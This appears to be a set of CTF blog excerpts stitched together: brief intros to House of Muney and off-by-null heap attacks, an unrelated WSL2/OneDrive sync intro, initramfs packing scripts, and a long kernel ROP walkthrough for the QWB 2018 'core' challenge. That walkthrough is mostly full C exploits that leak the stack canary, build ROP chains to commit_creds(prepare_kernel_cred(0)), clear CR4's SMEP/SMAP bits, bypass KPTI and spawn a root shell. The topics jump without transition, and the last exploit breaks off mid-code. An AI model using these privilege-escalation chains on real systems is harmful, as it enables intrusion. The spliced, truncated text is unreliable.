
「Pwn」A Shallow Analysis of House of Muney


A few days ago ZBR shared this repo. I had never heard of it, and the attack looked fairly powerful, so here is a shallow analysis.

Simply put, this house can do the following: bypass ASLR and achieve code execution without any leak.

Its exploitation requirements are as follows:

  • Partial RELRO / No RELRO — it needs to modify .dynsym to change the result of dl resolution
  • The ability to allocate a fairly large chunk — large enough that it is served by MMAP
  • The ability to overwrite that chunk's prev_size and size fields, so that the IS_MMAPPED bit can be tampered with (a minimal sketch of the trigger follows this list)
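As a rough illustration of the last point, here is a minimal sketch of the trigger conditions (assuming the default mmap threshold of 128KB; this shows only the setup, not the attack itself): a sufficiently large request is served by mmap() and typically lands directly below libc, and since free() of an IS_MMAPPED chunk goes straight to munmap_chunk(), corrupting prev_size/size would let that free() unmap more than was originally mapped, including the libc pages that hold .gnu.hash and .dynsym.

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    /* 1. A large request is served by mmap(); the chunk header sits right
     *    below the returned pointer, and the mapping is usually placed just
     *    below libc. */
    unsigned char *big = malloc(0x40000);
    size_t *hdr = (size_t *)(big - 0x10);   /* hdr[0] = prev_size, hdr[1] = size */

    printf("mmap'd chunk header at %p, size field = %#zx\n", (void *)hdr, hdr[1]);

    /* 2. In the real attack, an overflow would rewrite hdr[0]/hdr[1] here,
     *    enlarging the size while keeping the IS_MMAPPED bit (0x2) set, so the
     *    free() below would munmap() the mapping *plus* the start of libc.
     *    We leave the header untouched so this sketch stays harmless. */

    /* 3. free() of an IS_MMAPPED chunk calls munmap_chunk() directly. */
    free(big);
    return 0;
}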

This post is based on a glibc 2.31 environment. To reproduce it, you can build a Docker image from the Dockerfile below:

FROM ubuntu:20.04

ENV DEBIAN_FRONTEND noninteractive

# Update
RUN apt-get update -y && apt-get install socat -y gdb vim tmux python3 python3-pip

# General things needed for pwntools and pwndbg to run
RUN apt-get install git build-essential libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev patchelf python3-dev -y

RUN pip3 install pwn

# Install pwndbg
RUN git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh && cd ../

RUN echo "set auto-load safe-path /" >> /root/.gdbinit

# Challenge files to ADD
RUN git clone https://github.com/mdulin2/house-of-muney

# Fixes the loader and recompiles the binary for us :)
RUN cd house-of-muney && ./compile.sh

Off-by-null Exploitation Techniques


I don't know why I never wrote any of this down before; every time I run into it again I have forgotten everything and have to relearn it from scratch.

This post mainly covers exploitation on glibc 2.23 and 2.31. 2.27 is almost the same as 2.23, except you have to fill up a tcache bin first; 2.29 is almost the same as 2.31, with the extra tcache key.
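For context, here is a rough sketch (from memory, so double-check against your glibc's malloc.c) of the tcache structures involved; the key field is the 2.29+ addition mentioned above, written on free() and used to detect double frees:

#include <stdint.h>

#define TCACHE_MAX_BINS 64

typedef struct tcache_entry {
    struct tcache_entry *next;
    /* Added in 2.29: set to the thread's tcache on free() and checked on the
     * next free() of the same chunk to catch double frees. */
    struct tcache_perthread_struct *key;
} tcache_entry;

typedef struct tcache_perthread_struct {
    uint16_t counts[TCACHE_MAX_BINS];       /* char counts[] before glibc 2.30 */
    tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;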

Therefore, reading this post assumes some background in heap allocation; it focuses more on techniques than on underlying principles.

The challenges covered in this post mostly share the following characteristics:

  • An off-by-null exists (a sketch of the primitive itself follows this list)
  • The number of allocations is essentially unlimited
  • Allocation sizes are essentially unlimited, or at least reach the largebin range
  • There is no edit function, or editing is allowed only once
  • Only one show is allowed (in principle no show at all also works, but the heap layout gets so tedious that you would be better off sleeping than solving such a challenge)
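To make the first point concrete, here is a minimal sketch of the off-by-null primitive assumed throughout this post; read_input is a hypothetical challenge-style helper, not from any specific binary. Reading exactly size bytes and then appending a terminating NUL writes one byte past the buffer, which lands on the low byte of the next chunk's size field and clears PREV_INUSE:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical helper: off-by-null when the input fills the buffer. */
static void read_input(char *buf, size_t size) {
    ssize_t n = read(0, buf, size);
    if (n > 0)
        buf[n] = '\0';          /* writes buf[size] when n == size */
}

int main(void) {
    char *a = malloc(0x28);     /* 0x30 chunk; its usable area runs right up to the next size field */
    char *b = malloc(0x4f8);    /* next chunk, size field 0x501 */

    read_input(a, 0x28);        /* feed exactly 0x28 bytes on stdin */

    /* Low byte of b's size is now 0x00: PREV_INUSE cleared, 0x501 -> 0x500. */
    printf("b's size field: %#zx\n", *(size_t *)(b - 8));
    return 0;
}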

Real-time Synchronization of OneDrive with inotify in WSL2


Recently, I've been working on some development projects, and I keep all my projects on OneDrive, using ln -s to create a symbolic link in WSL2 for development.

Cross-file-system I/O between WSL2's ext4 and Windows' NTFS is painfully slow, and venv and node_modules directories heavily pollute my OneDrive. Despite some optimizations, frequent use of commands like git status left me somewhat dissatisfied with this approach. Still, I always felt that the benefits of OneDrive synchronization outweighed these side effects, so I never did anything about it. Yesterday I came across Dev Drive and suddenly thought: why not change it?

Considering that projects typically involve a large number of files, mostly small ones, I decided to migrate certain folders to WSL2 and use Robocopy to synchronize content bidirectionally between OneDrive and WSL2, trading space for efficiency.

This article will be tailored to my specific use case. If you just need to back up WSL2 content to OneDrive, I recommend referring to this article.

kernel_emergency

#!/bin/bash

# Default target folder
folder="fs"

# Parse parameters
while [[ "$#" -gt 0 ]]; do
case $1 in
-f | --folder)
folder="$2"
shift
;;
*)
cpio_path="$1"
;;
esac
shift
done

# Check if cpio_path is provided
if [[ -z "$cpio_path" ]]; then
echo "Usage: $0 [-f|--folder folder_name] cpio_path"
exit 1
fi

# Create target folder
mkdir -p "$folder"

# Copy cpio_path to target folder
cp "$cpio_path" "$folder"

# Get file name
cpio_file=$(basename "$cpio_path")

# Enter target folder
cd "$folder" || exit

# Check if file is gzip compressed
if file "$cpio_file" | grep -q "gzip compressed"; then
echo "$cpio_file is gzip compressed, checking extension..."

# Check if file name has .gz suffix
if [[ "$cpio_file" != *.gz ]]; then
mv "$cpio_file" "$cpio_file.gz"
cpio_file="$cpio_file.gz"
fi

echo "Decompressing $cpio_file..."
gunzip "$cpio_file"
# Remove .gz suffix to get decompressed file name
cpio_file="${cpio_file%.gz}"
fi

# Extract cpio file
echo "Extracting $cpio_file to file system..."
cpio -idmv <"$cpio_file"
rm "$cpio_file"
echo "Extraction complete."
#!/bin/bash

if [[ $# -ne 1 ]]; then
echo "Usage: $0 cpio_path"
exit 1
fi

cpio_file="../$1"

find . -print0 |
cpio --null -ov --format=newc |
gzip -9 >"$cpio_file"
#!/bin/bash

folder="fs"
cpio_file="initramfs.cpio.gz"
gcc_options=()

while [[ $# -gt 0 ]]; do
case $1 in
-f|--folder)
folder="$2"
shift
;;
-c|--cpio)
cpio_file="$2"
shift
;;
-*)
gcc_options+=("$1")
;;
*)
src="$1"
;;
esac
shift
done

if [ -z "$src" ]; then
echo "Usage: compile.sh [options] <source file>"
echo "Options:"
echo " -f, --folder <folder> Specify the folder to store the compiled binary"
echo " -c, --cpio <file> Specify the cpio file name"
echo " <other options> Options to pass to musl-gcc"
exit 1
fi

out=$(basename "$src" .c)

echo -e "\033[35mCompiling $src to $folder/$out\033[0m"
musl-gcc -static "${gcc_options[@]}" "$src" -Os -s -o "$out" -masm=intel
strip "$out"
mv "$out" "$folder/"
cd "$folder"

echo -e "\033[35mCreating cpio archive $cpio_file...\033[0m"
find . -print0 | cpio --null -ov --format=newc | gzip -9 > "../${cpio_file}"
echo -e "\033[35mDone\033[0m"

Kernel ROP

In this section, we will strengthen the protection measures step by step, using the QWB 2018 core challenge as the base.

Analysis

Since the vulnerability analysis is very straightforward, we will not go into details. You can search for keywords to view the analysis.

Lv1. KCanary + KASLR

Initially, I wanted to disable KCanary as well, but it requires recompiling the kernel, which is too cumbersome.

Thus, Lv1 is the scenario with KCanary enabled and all other protections disabled.

qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./initramfs.cpio.gz \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic

In this scenario, we only need to read /tmp/kallsyms to get the addresses of commit_creds and prepare_kernel_cred functions.

However, since we can directly obtain the addresses, having KASLR does not make much difference, so we combine the two.

First, we need to find the addresses of commit_creds and prepare_kernel_cred functions.

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

Then we need to calculate the KASLR offset. Using tools like checksec, we can see that the kernel's non-randomized base is 0xffffffff81000000, and we can also find the address of commit_creds under this base:

e = ELF('./vmlinux.unstripped')
hex(e.sym['commit_creds'])

Thus, the offset is calculated as follows:

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;

At this point, using the stack overflow, we can modify the return address.

// musl-gcc -static -masm=intel -Wno-error=int-conversion -o exp exp.c  // makes compiler happy
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>


#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getroot() {
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}


int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = (size_t)getroot;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

Lv2. KCanary + KASLR + SMEP + SMAP

The above method uses ret2usr, but what if we add SMEP and SMAP?

qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-cpu qemu64-v1,+smep,+smap \
-initrd ./initramfs.cpio.gz \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic

Method 0x1 - KROP

The simplest approach is to use the overflow directly to write the ROP chain.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RDI_RET + offset;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = POP_RDX_RET + offset;
rop[i++] = POP_RCX_RET + offset;
rop[i++] = MOV_RDI_RAX_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));

}


Method 0x2 - Disable SMEP/SMAP

The above method is not strictly considered "bypassing." Therefore, let's continue to look at how SMEP and SMAP operate.

![image.png](https://i.loli.net/2021/09/07/sYFKuZiUVNIclBp.png)

So, in essence, they are just two bits in the CR4 register, which we can set to zero.
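For reference, SMEP and SMAP correspond to CR4 bits 20 and 21 (bit positions taken from the Intel SDM), and the value 0x6f0 written later in the chain leaves both clear; a trivial check:

#include <stdio.h>

#define CR4_SMEP (1UL << 20)
#define CR4_SMAP (1UL << 21)

int main(void) {
    unsigned long cr4 = 0x6f0;   /* the value the ROP chain below writes into CR4 */
    printf("SMEP: %lu, SMAP: %lu\n",
           (cr4 & CR4_SMEP) >> 20, (cr4 & CR4_SMAP) >> 21);   /* both print 0 */
    return 0;
}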

Using ropper, we look for gadgets that pop into cr4, but none are found. Instead, we find a gadget that writes rax into cr4:

`0xffffffff81002515: mov cr4, rax; push rcx; popfq; ret;`

We then rearrange the ROP chain to set cr4 to 0x6f0 (for simplicity; you could also use other gadgets to clear just the SMEP/SMAP bits precisely, e.g. by xor-ing or masking them).

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RAX_RET + offset;
rop[i++] = 0x6f0;
rop[i++] = MOV_CR4_RAX_PUSH_RCX_POPFQ_RET + offset;
rop[i++] = (size_t)getroot;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

Lv.3 KCanary + KASLR + SMEP + SMAP + KPTI

With KPTI added, the previous Method 0x2 no longer works, but Method 0x1 still does, because KPTI only enforces page-table isolation. However, since we are still on the kernel-mode PGD while in kernel space, we need some extra work to switch back before returning to user mode.

KPTI, in simple terms, doubles the PGD into an 8KB region: one 4KB half is the user-mode PGD and the other 4KB half is the kernel-mode PGD. Switching between them only requires flipping bit 12 of the CR3 register (the 0x1000 bit).
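As a user-space illustration of that bit (the concrete CR3 value here is made up; this is not kernel code), setting bit 12 is exactly what the `or rdi, 0x1000` in the trampoline summarized a bit further down does:

#include <stdio.h>
#include <stdint.h>

int main(void) {
    uint64_t kernel_cr3 = 0x12340000ULL;             /* hypothetical CR3 while in the kernel */
    uint64_t user_cr3   = kernel_cr3 | (1ULL << 12); /* set bit 12 (0x1000) -> the other PGD */
    printf("kernel CR3 = %#llx, user CR3 = %#llx\n",
           (unsigned long long)kernel_cr3, (unsigned long long)user_cr3);
    return 0;
}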

qemu-system-x86_64 \
-m 128M \
-cpu qemu64-v1,+smep,+smap \
-kernel ./bzImage \
-initrd ./initramfs.cpio.gz \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr pti=on" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic

Method 0x1 - swapgs_restore_regs_and_return_to_usermode

The simplest approach is to reuse the correct switching sequence inside swapgs_restore_regs_and_return_to_usermode. Its register and stack operations can be summarized as follows, which is why we add two padding values to the ROP chain (consumed by the pop rax / pop rdi):

mov  rdi, cr3
or rdi, 0x1000
mov cr3, rdi
pop rax
pop rdi
swapgs
iretq

The full exploit, with the ROP chain's tail going through swapgs_restore_regs_and_return_to_usermode:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>


#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define POP_RAX_RET 0xffffffff810520cf
#define MOV_CR4_RAX_PUSH_RCX_POPFQ_RET 0xffffffff81002515
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81a008f0

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getroot() {
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}


int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RDI_RET + offset;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = POP_RDX_RET + offset;
rop[i++] = POP_RCX_RET + offset;
rop[i++] = MOV_RDI_RAX_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + offset;
rop[i++] = 0;
rop[i++] = 0;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));

}

Method 0x2 - Signal Handling

If we return directly without switching page tables, we can see it reports a SEGMENTATION FAULT instead of panicking, which indicates that we have actually returned to user mode. In this case, we can simply use a signal handler to handle the situation.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define POP_RAX_RET 0xffffffff810520cf
#define MOV_CR4_RAX_PUSH_RCX_POPFQ_RET 0xffffffff81002515
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getroot() {
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();
signal(SIGSEGV, shell);

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}
}

offset = commit_creds - 0x9c8e0 - 0xffffffff81000000;
core_set_offset(fd, 64);
core_read(fd, name);
canary = ((size_t *)name)[0];
printf("\033[34m\033[1m[*] offset: 0x%lx\033[0m\n", offset);
printf("\033[33m\033[1m[√] Canary: %lx\033[0m\n", canary);

for (i = 0; i < 10; i++) rop[i] = canary;
rop[i++] = POP_RDI_RET + offset;
rop[i++] = 0;
rop[i++] = prepare_kernel_cred;
rop[i++] = POP_RDX_RET + offset;
rop[i++] = POP_RCX_RET + offset;
rop[i++] = MOV_RDI_RAX_CALL_RDX + offset;
rop[i++] = commit_creds;
rop[i++] = SWAPGS_POPFQ_RET + offset;
rop[i++] = 0;
rop[i++] = IRETQ + offset;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;

write(fd, rop, 0x100);
core_copy(fd, 0xffffffffffff0000 | (0x100));
}

Lv.4 KCanary + FGKASLR + SMEP + SMAP + KPTI

For this challenge, FGKASLR is not much of an obstacle because we can read the positions of all symbols anyway. Moreover, it was not actually enabled when the kernel was compiled (laughs).

Method 0x1 - .text Gadgets

We will use the original method, but this time we calculate the offset from swapgs_restore_regs_and_return_to_usermode: under FGKASLR the range 0xffffffff81000000 to 0xffffffff83000000 is only shifted as a whole, so offsets within it remain constant, and this symbol and all of our gadgets live in that region.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>

#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define POP_RAX_RET 0xffffffff810520cf
#define MOV_CR4_RAX_PUSH_RCX_POPFQ_RET 0xffffffff81002515
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define IRETQ 0xffffffff81050ac2

#pragma clang diagnostic ignored "-Wconversion" // makes me happy

size_t user_cs, user_ss, user_rflags, user_sp;
size_t prepare_kernel_cred, commit_creds, swapgs_restore_regs_and_return_to_usermode;
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void shell() {
if (!getuid()) {
system("/bin/sh");
} else {
puts("\033[31m\033[1m[-] Exploit failed.\033[0m");
exit(0);
}
}

void core_read(int fd, char* buf) {
ioctl(fd, 0x6677889B, buf);
}

void core_set_offset(int fd, size_t offset) {
ioctl(fd, 0x6677889C, offset);
}

void core_copy(int fd, size_t nbytes) {
ioctl(fd, 0x6677889A, nbytes);
}

void getroot() {
void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

int main() {
FILE *syms;
int fd;
size_t offset;

size_t addr;
size_t canary;
char type[256], name[256];

size_t rop[0x100], i;

puts("\033[34m\033[1m[*] Start to exploit...\033[0m");
save_status();
signal(SIGSEGV, shell);

fd = open("/proc/core", O_RDWR);
if (fd < 0) {
puts("\033[31m\033[1m[-] Open /proc/core failed.\033[0m");
exit(0);
}

syms = fopen("/tmp/kallsyms", "r");
if (syms == NULL) {
puts("\033[31m\033[1m[-] Open /tmp/kallsyms failed.\033[0m");
exit(0);
}

while (fscanf(syms, "%lx %s %s", &addr, type, name)) {
if (prepare_kernel_cred && commit_creds && swapgs_restore_regs_and_return_to_usermode) {
break;
}

if (!prepare_kernel_cred && strcmp(name, "prepare_kernel_cred") == 0) {
prepare_kernel_cred = addr;
printf("\033[33m\033[1m[√] Found prepare_kernel_cred: %lx\033[0m\n", prepare_kernel_cred);
}

if (!commit_creds && strcmp(name, "commit_creds") == 0) {
commit_creds = addr;
printf("\033[33m\033[1m[√] Found commit_creds: %lx\033[0m\n", commit_creds);
}

if (!swapgs_restore_regs_and_return_to_usermode && strcmp(name, "swapgs_restore_regs_and_return_to_usermode") == 0) {
